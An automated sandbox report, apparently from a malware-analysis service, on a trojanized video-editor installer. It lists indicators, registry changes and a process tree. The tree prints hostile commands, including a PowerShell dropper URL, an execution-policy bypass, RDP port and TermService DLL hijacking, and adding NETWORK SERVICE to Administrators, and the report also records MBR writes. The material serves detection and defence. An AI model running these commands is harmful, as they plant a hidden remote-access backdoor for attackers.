79745c2263c8abe5b916e39e577652c029b5b586e7ccb39ee63ed0fc1568c39d

Analysis

max time kernel
128s
max time network
136s
platform
windows10_x64
resource
win10v20210410
submitted
21-07-2021 08:36

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

Filmora-Wondershare-Installer.exe
Size

9.2MB
MD5

5e12e56a643c71b913ea60f48f28726d
SHA1

8fd9ef3e15b545335c9cf8a16e7d49bdedc7b6fd
SHA256

79745c2263c8abe5b916e39e577652c029b5b586e7ccb39ee63ed0fc1568c39d
SHA512

807888068394b8072d607a83b7a181f5018c21c1efd2b8ae433ac59dc28bfbec23e1b13d8b6a2447a3ff8bb9b7ecd71d4d7bff55903a2d23a60b817142c9bae3

Score

10^/10

bootkit persistence upx

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

ps1.dropper

https://raw.githubusercontent.com/sqlitey/sqlite/master/speed.ps1

Signatures

Grants admin privileges 1 TTPs
Uses net.exe to modify the user's privileges.

Account Manipulation
T1098

Blocklisted process makes network request 9 IoCs

Processes:

powershell.exe

flow	pid	process
18	4292	powershell.exe
20	4292	powershell.exe
21	4292	powershell.exe
22	4292	powershell.exe
24	4292	powershell.exe
26	4292	powershell.exe
28	4292	powershell.exe
30	4292	powershell.exe
32	4292	powershell.exe

Executes dropped EXE 4 IoCs

Processes:

ViJoy.exeexe2.exeexe1.exeNFWCHK.exe

pid process

2488 ViJoy.exe
3268 exe2.exe
3304 exe1.exe
1684 NFWCHK.exe
Modifies RDP port number used by Windows 1 TTPs

Remote Desktop Protocol
T1076
Sets DLL path for service in the registry 2 TTPs
persistence

Registry Run Keys / Startup Folder
T1060

Modify Registry
T1112

pid	process
2488	ViJoy.exe
3268	exe2.exe
3304	exe1.exe
1684	NFWCHK.exe

UPX packed file 2 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

Processes:

resource	yara_rule
\Windows\Branding\mediasrv.png	upx
\Windows\Branding\mediasvc.png	upx

Checks computer location settings 2 TTPs 1 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

Processes:

Filmora-Wondershare-Installer.exe

description	ioc	process
Key value queried	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000\Control Panel\International\Geo\Nation	Filmora-Wondershare-Installer.exe

Deletes itself 1 IoCs

Processes:

powershell.exe

pid process

1816 powershell.exe
Loads dropped DLL 2 IoCs

Processes:

pid process

4692
4692
Writes to the Master Boot Record (MBR) 1 TTPs 1 IoCs
Bootkits write to the MBR to gain persistence at a level below the operating system.
bootkit persistence

Bootkit
T1067

Processes:

exe2.exe

description ioc process

File opened for modification \??\PhysicalDrive0 exe2.exe

pid	process
4692
4692

description	ioc	process
File opened for modification	\??\PhysicalDrive0	exe2.exe

Drops file in Program Files directory 4 IoCs

Processes:

powershell.exe

description	ioc	process
File opened for modification	C:\Program Files\Uninstall Information\IE40.UserAgent\IE40.UserAgent.DAT	powershell.exe
File opened for modification	C:\Program Files\Uninstall Information\IE40.UserAgent\IE40.UserAgent.INI	powershell.exe
File opened for modification	C:\Program Files\Uninstall Information\IE.HKCUZoneInfo\IE.HKCUZoneInfo.DAT	powershell.exe
File opened for modification	C:\Program Files\Uninstall Information\IE.HKCUZoneInfo\IE.HKCUZoneInfo.INI	powershell.exe

Drops file in Windows directory 19 IoCs

Processes:

powershell.exepowershell.exe

description	ioc	process
File opened for modification	C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\RGI6EAF.tmp	powershell.exe
File opened for modification	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\INetCache\counters2.dat	powershell.exe
File created	C:\Windows\branding\mediasrv.png	powershell.exe
File opened for modification	C:\Windows\branding\ShellBrd	powershell.exe
File opened for modification	C:\Windows\branding\mediasvc.png	powershell.exe
File opened for modification	C:\Windows\branding\wupsvc.jpg	powershell.exe
File created	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\__PSScriptPolicyTest_kb1ue3tv.ivt.ps1	powershell.exe
File created	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\__PSScriptPolicyTest_uvddbqio.rzs.psm1	powershell.exe
File created	C:\Windows\branding\mediasvc.png	powershell.exe
File created	C:\Windows\branding\wupsvc.jpg	powershell.exe
File opened for modification	C:\Windows\branding\mediasrv.png	powershell.exe
File created	C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\TMP4352$.TMP	powershell.exe
File opened for modification	C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\RGI6EFF.tmp	powershell.exe
File opened for modification	C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\RGI6ECF.tmp	powershell.exe
File opened for modification	C:\Windows\branding\Basebrd	powershell.exe
File opened for modification	C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\RGI6E8E.tmp	powershell.exe
File opened for modification	C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\RGI6F0F.tmp	powershell.exe
File created	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive	powershell.exe
File created	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log	powershell.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Modifies data under HKEY_USERS 64 IoCs

Processes:

powershell.exeWMIC.exe

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\CA\Certificates	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\Root\CRLs	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\PMDisplayName = "Local intranet [Protected Mode]"	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\CurrentLevel = "70912"	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\LowIcon = "inetcpl.cpl#005426"	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProtocolDefaults\ftp = "3"	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\Description = "This zone contains Web sites that could potentially damage your computer or data."	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\0\Icon = "shell32.dll#0016"	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\2\LowIcon = "inetcpl.cpl#005424"	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\CA	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\Root\CTLs	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\1200 = "0"	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Advanced INF Setup\IE40.UserAgent\RegBackup\0.map\ef29a4ec885fa451 = ",33,HKCU,Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings,User Agent,"	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\3\1200 = "3"	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProtocolDefaults	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\SmartCardRoot	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\TrustedPeople	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\3\PMDisplayName = "Internet [Protected Mode]"	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2\1400 = "0"	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\3\1400 = "1"	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\	WMIC.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\DisplayName = "Internet"	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\Flags = "3"	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Classes\Local Settings\MuiCache	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\DisplayName = "My Computer"	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2\LowIcon = "inetcpl.cpl#005424"	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\1\PMDisplayName = "Local intranet [Protected Mode]"	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\4\1400 = "3"	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "0"	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\trust\Certificates	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\Flags = "1"	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\0\DisplayName = "My Computer"	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\1\DisplayName = "Local intranet"	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\Root	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\2\DisplayName = "Trusted sites"	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\3	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\4\LowIcon = "inetcpl.cpl#005426"	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Classes\Local Settings\MuiCache\16\52C64B7E	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\Ranges	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\0\DisplayName = "Computer"	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Advanced INF Setup\IE40.UserAgent\RegBackup\0	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyByPass = "0"	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0"	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\1200 = "3"	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Advanced INF Setup\IE40.UserAgent\RegBackup\0.map\2ba02e083fadee33 = ",33,HKCU,Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings,IE5_UA_Backup_Flag,"	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Advanced INF Setup\IE40.UserAgent\RegBackup	powershell.exe
Set value (data)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Advanced INF Setup\IE.HKCUZoneInfo\RegBackup\0\57fd7ae31ab34c2c = 2c0053004f004600540057004100520045005c004d006900630072006f0073006f00660074005c00570069006e0064006f00770073005c00430075007200720065006e007400560065007200730069006f006e005c0049006e007400650072006e00650074002000530065007400740069006e00670073005c0035002e0030005c00430061006300680065002c000000	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\PMDisplayName = "Restricted sites [Protected Mode]"	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\4\Description = "This zone contains Web sites that could potentially damage your computer or data."	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\User Agent = "Mozilla/4.0 (compatible; MSIE 8.0; Win32)"	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\3\Description = "This zone contains all Web sites you haven't placed in other zones"	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProtocolDefaults\http = "3"	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\1200 = "0"	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\Disallowed\CTLs	powershell.exe

Modifies registry class 1 IoCs

Processes:

Filmora-Wondershare-Installer.exe

description	ioc	process
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance	Filmora-Wondershare-Installer.exe

Modifies registry key 1 TTPs 1 IoCs

Modify Registry
T1112

Processes:

reg.exe

pid process

4292 reg.exe
Runs net.exe

pid	process
4292	reg.exe

Script User-Agent 4 IoCs

Uses user-agent string associated with script host/environment.

Processes:

description	flow	ioc
HTTP User-Agent header	20	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	21	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	22	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	24	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)

Suspicious behavior: EnumeratesProcesses 18 IoCs

Processes:

powershell.exepowershell.exepowershell.exepowershell.exepowershell.exe

pid	process
1816	powershell.exe
1816	powershell.exe
1816	powershell.exe
3844	powershell.exe
3844	powershell.exe
3844	powershell.exe
1988	powershell.exe
1988	powershell.exe
1988	powershell.exe
1784	powershell.exe
1784	powershell.exe
1784	powershell.exe
1816	powershell.exe
1816	powershell.exe
1816	powershell.exe
4292	powershell.exe
4292	powershell.exe
4292	powershell.exe

Suspicious behavior: LoadsDriver 2 IoCs

Processes:

pid process

620
620

pid	process
620
620

Suspicious use of AdjustPrivilegeToken 64 IoCs

Processes:

powershell.exepowershell.exepowershell.exepowershell.exe

description	pid	process
Token: SeDebugPrivilege	1816	powershell.exe
Token: SeDebugPrivilege	3844	powershell.exe
Token: SeIncreaseQuotaPrivilege	3844	powershell.exe
Token: SeSecurityPrivilege	3844	powershell.exe
Token: SeTakeOwnershipPrivilege	3844	powershell.exe
Token: SeLoadDriverPrivilege	3844	powershell.exe
Token: SeSystemProfilePrivilege	3844	powershell.exe
Token: SeSystemtimePrivilege	3844	powershell.exe
Token: SeProfSingleProcessPrivilege	3844	powershell.exe
Token: SeIncBasePriorityPrivilege	3844	powershell.exe
Token: SeCreatePagefilePrivilege	3844	powershell.exe
Token: SeBackupPrivilege	3844	powershell.exe
Token: SeRestorePrivilege	3844	powershell.exe
Token: SeShutdownPrivilege	3844	powershell.exe
Token: SeDebugPrivilege	3844	powershell.exe
Token: SeSystemEnvironmentPrivilege	3844	powershell.exe
Token: SeRemoteShutdownPrivilege	3844	powershell.exe
Token: SeUndockPrivilege	3844	powershell.exe
Token: SeManageVolumePrivilege	3844	powershell.exe
Token: 33	3844	powershell.exe
Token: 34	3844	powershell.exe
Token: 35	3844	powershell.exe
Token: 36	3844	powershell.exe
Token: SeDebugPrivilege	1988	powershell.exe
Token: SeIncreaseQuotaPrivilege	1988	powershell.exe
Token: SeSecurityPrivilege	1988	powershell.exe
Token: SeTakeOwnershipPrivilege	1988	powershell.exe
Token: SeLoadDriverPrivilege	1988	powershell.exe
Token: SeSystemProfilePrivilege	1988	powershell.exe
Token: SeSystemtimePrivilege	1988	powershell.exe
Token: SeProfSingleProcessPrivilege	1988	powershell.exe
Token: SeIncBasePriorityPrivilege	1988	powershell.exe
Token: SeCreatePagefilePrivilege	1988	powershell.exe
Token: SeBackupPrivilege	1988	powershell.exe
Token: SeRestorePrivilege	1988	powershell.exe
Token: SeShutdownPrivilege	1988	powershell.exe
Token: SeDebugPrivilege	1988	powershell.exe
Token: SeSystemEnvironmentPrivilege	1988	powershell.exe
Token: SeRemoteShutdownPrivilege	1988	powershell.exe
Token: SeUndockPrivilege	1988	powershell.exe
Token: SeManageVolumePrivilege	1988	powershell.exe
Token: 33	1988	powershell.exe
Token: 34	1988	powershell.exe
Token: 35	1988	powershell.exe
Token: 36	1988	powershell.exe
Token: SeDebugPrivilege	1784	powershell.exe
Token: SeIncreaseQuotaPrivilege	1784	powershell.exe
Token: SeSecurityPrivilege	1784	powershell.exe
Token: SeTakeOwnershipPrivilege	1784	powershell.exe
Token: SeLoadDriverPrivilege	1784	powershell.exe
Token: SeSystemProfilePrivilege	1784	powershell.exe
Token: SeSystemtimePrivilege	1784	powershell.exe
Token: SeProfSingleProcessPrivilege	1784	powershell.exe
Token: SeIncBasePriorityPrivilege	1784	powershell.exe
Token: SeCreatePagefilePrivilege	1784	powershell.exe
Token: SeBackupPrivilege	1784	powershell.exe
Token: SeRestorePrivilege	1784	powershell.exe
Token: SeShutdownPrivilege	1784	powershell.exe
Token: SeDebugPrivilege	1784	powershell.exe
Token: SeSystemEnvironmentPrivilege	1784	powershell.exe
Token: SeRemoteShutdownPrivilege	1784	powershell.exe
Token: SeUndockPrivilege	1784	powershell.exe
Token: SeManageVolumePrivilege	1784	powershell.exe
Token: 33	1784	powershell.exe

Suspicious use of SetWindowsHookEx 2 IoCs

Processes:

exe2.exe

pid process

3268 exe2.exe
3268 exe2.exe

pid	process
3268	exe2.exe
3268	exe2.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

Filmora-Wondershare-Installer.exeViJoy.exeexe2.exeexe1.exepowershell.execsc.exenet.execmd.execmd.exenet.execmd.execmd.exenet.execmd.exenet.execmd.exenet.execmd.exenet.execmd.exenet.exe

description	pid	process	target process
PID 680 wrote to memory of 2488	680	Filmora-Wondershare-Installer.exe	ViJoy.exe
PID 680 wrote to memory of 2488	680	Filmora-Wondershare-Installer.exe	ViJoy.exe
PID 680 wrote to memory of 2488	680	Filmora-Wondershare-Installer.exe	ViJoy.exe
PID 2488 wrote to memory of 3304	2488	ViJoy.exe	exe1.exe
PID 2488 wrote to memory of 3304	2488	ViJoy.exe	exe1.exe
PID 2488 wrote to memory of 3268	2488	ViJoy.exe	exe2.exe
PID 2488 wrote to memory of 3268	2488	ViJoy.exe	exe2.exe
PID 2488 wrote to memory of 3268	2488	ViJoy.exe	exe2.exe
PID 3268 wrote to memory of 1684	3268	exe2.exe	NFWCHK.exe
PID 3268 wrote to memory of 1684	3268	exe2.exe	NFWCHK.exe
PID 3304 wrote to memory of 1816	3304	exe1.exe	powershell.exe
PID 3304 wrote to memory of 1816	3304	exe1.exe	powershell.exe
PID 1816 wrote to memory of 3860	1816	powershell.exe	csc.exe
PID 1816 wrote to memory of 3860	1816	powershell.exe	csc.exe
PID 3860 wrote to memory of 1776	3860	csc.exe	cvtres.exe
PID 3860 wrote to memory of 1776	3860	csc.exe	cvtres.exe
PID 1816 wrote to memory of 3844	1816	powershell.exe	powershell.exe
PID 1816 wrote to memory of 3844	1816	powershell.exe	powershell.exe
PID 1816 wrote to memory of 1988	1816	powershell.exe	powershell.exe
PID 1816 wrote to memory of 1988	1816	powershell.exe	powershell.exe
PID 1816 wrote to memory of 1784	1816	powershell.exe	powershell.exe
PID 1816 wrote to memory of 1784	1816	powershell.exe	powershell.exe
PID 1816 wrote to memory of 4272	1816	powershell.exe	reg.exe
PID 1816 wrote to memory of 4272	1816	powershell.exe	reg.exe
PID 1816 wrote to memory of 4292	1816	powershell.exe	reg.exe
PID 1816 wrote to memory of 4292	1816	powershell.exe	reg.exe
PID 1816 wrote to memory of 4312	1816	powershell.exe	reg.exe
PID 1816 wrote to memory of 4312	1816	powershell.exe	reg.exe
PID 1816 wrote to memory of 4496	1816	powershell.exe	net.exe
PID 1816 wrote to memory of 4496	1816	powershell.exe	net.exe
PID 4496 wrote to memory of 4516	4496	net.exe	net1.exe
PID 4496 wrote to memory of 4516	4496	net.exe	net1.exe
PID 1816 wrote to memory of 4548	1816	powershell.exe	cmd.exe
PID 1816 wrote to memory of 4548	1816	powershell.exe	cmd.exe
PID 4548 wrote to memory of 4564	4548	cmd.exe	cmd.exe
PID 4548 wrote to memory of 4564	4548	cmd.exe	cmd.exe
PID 4564 wrote to memory of 4580	4564	cmd.exe	net.exe
PID 4564 wrote to memory of 4580	4564	cmd.exe	net.exe
PID 4580 wrote to memory of 4600	4580	net.exe	net1.exe
PID 4580 wrote to memory of 4600	4580	net.exe	net1.exe
PID 1816 wrote to memory of 4620	1816	powershell.exe	cmd.exe
PID 1816 wrote to memory of 4620	1816	powershell.exe	cmd.exe
PID 4620 wrote to memory of 4636	4620	cmd.exe	cmd.exe
PID 4620 wrote to memory of 4636	4620	cmd.exe	cmd.exe
PID 4636 wrote to memory of 4652	4636	cmd.exe	net.exe
PID 4636 wrote to memory of 4652	4636	cmd.exe	net.exe
PID 4652 wrote to memory of 4672	4652	net.exe	net1.exe
PID 4652 wrote to memory of 4672	4652	net.exe	net1.exe
PID 4740 wrote to memory of 4780	4740	cmd.exe	net.exe
PID 4740 wrote to memory of 4780	4740	cmd.exe	net.exe
PID 4780 wrote to memory of 4800	4780	net.exe	net1.exe
PID 4780 wrote to memory of 4800	4780	net.exe	net1.exe
PID 4820 wrote to memory of 4860	4820	cmd.exe	net.exe
PID 4820 wrote to memory of 4860	4820	cmd.exe	net.exe
PID 4860 wrote to memory of 4880	4860	net.exe	net1.exe
PID 4860 wrote to memory of 4880	4860	net.exe	net1.exe
PID 4900 wrote to memory of 4940	4900	cmd.exe	net.exe
PID 4900 wrote to memory of 4940	4900	cmd.exe	net.exe
PID 4940 wrote to memory of 4960	4940	net.exe	net1.exe
PID 4940 wrote to memory of 4960	4940	net.exe	net1.exe
PID 4980 wrote to memory of 5020	4980	cmd.exe	net.exe
PID 4980 wrote to memory of 5020	4980	cmd.exe	net.exe
PID 5020 wrote to memory of 5040	5020	net.exe	net1.exe
PID 5020 wrote to memory of 5040	5020	net.exe	net1.exe

C:\Users\Admin\AppData\Local\Temp\Filmora-Wondershare-Installer.exe
"C:\Users\Admin\AppData\Local\Temp\Filmora-Wondershare-Installer.exe"
1⤵
- Checks computer location settings
- Modifies registry class
- Suspicious use of WriteProcessMemory
PID:680

C:\Users\Admin\AppData\Local\Temp\ViJoy.exe
"C:\Users\Admin\AppData\Local\Temp\ViJoy.exe"
2⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:2488

C:\Users\Admin\AppData\Roaming\Templers\exe2.exe
"C:\Users\Admin\AppData\Roaming\Templers\exe2.exe"
3⤵
- Executes dropped EXE
- Writes to the Master Boot Record (MBR)
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:3268

C:\Users\Public\Documents\Wondershare\NFWCHK.exe
C:\Users\Public\Documents\Wondershare\NFWCHK.exe
4⤵
- Executes dropped EXE
PID:1684

C:\Users\Admin\AppData\Roaming\Templers\exe1.exe
"C:\Users\Admin\AppData\Roaming\Templers\exe1.exe"
3⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:3304

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" -ep bypass & 'C:\Users\Admin\AppData\Local\Temp\\ready.ps1'
4⤵
- Deletes itself
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1816

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\ca1csawe\ca1csawe.cmdline"
5⤵
- Suspicious use of WriteProcessMemory
PID:3860

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES385B.tmp" "c:\Users\Admin\AppData\Local\Temp\ca1csawe\CSCCA8CC198C1144714B612E13F5E396C81.TMP"
6⤵
PID:1776

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
5⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3844

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
5⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1988

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
5⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1784

C:\Windows\system32\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v PortNumber /t REG_DWORD /d 0x1C21 /f
5⤵
PID:4272

C:\Windows\system32\reg.exe
"C:\Windows\system32\reg.exe" add HKLM\system\currentcontrolset\services\TermService\parameters /v ServiceDLL /t REG_EXPAND_SZ /d C:\Windows\branding\mediasrv.png /f
5⤵
- Modifies registry key
PID:4292

C:\Windows\system32\reg.exe
"C:\Windows\system32\reg.exe" add "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\Terminal Services" /v fEnableWddmDriver /t reg_dword /d 0 /f
5⤵
PID:4312

C:\Windows\system32\net.exe
"C:\Windows\system32\net.exe" localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add
5⤵
- Suspicious use of WriteProcessMemory
PID:4496

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add
6⤵
PID:4516

C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe" /c cmd /c net start rdpdr
5⤵
- Suspicious use of WriteProcessMemory
PID:4548

C:\Windows\system32\cmd.exe
cmd /c net start rdpdr
6⤵
- Suspicious use of WriteProcessMemory
PID:4564

C:\Windows\system32\net.exe
net start rdpdr
7⤵
- Suspicious use of WriteProcessMemory
PID:4580

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 start rdpdr
8⤵
PID:4600

C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe" /c cmd /c net start TermService
5⤵
- Suspicious use of WriteProcessMemory
PID:4620

C:\Windows\system32\cmd.exe
cmd /c net start TermService
6⤵
- Suspicious use of WriteProcessMemory
PID:4636

C:\Windows\system32\net.exe
